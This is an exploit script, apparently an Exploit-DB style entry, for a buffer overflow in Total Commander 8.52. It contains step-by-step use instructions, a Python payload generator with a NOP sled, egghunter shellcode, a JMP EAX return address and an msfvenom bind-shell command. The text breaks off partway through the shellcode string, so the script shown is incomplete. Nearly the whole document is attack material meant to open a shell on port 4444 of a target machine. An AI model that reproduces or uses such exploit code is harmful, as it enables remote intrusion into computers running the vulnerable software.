# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'w');
buffer = "\x90"*190
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
buffer += "\x90"*(265- len(buffer))
buffer += "\x47\x47\xf7\x75"#75F74747 FFE0 JMP EAX
# bad characters - \x00\x0a\x0d
# msfvenom -p windows/shell_bind_tcp -f c-b '\x00\x0a\x0d'
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"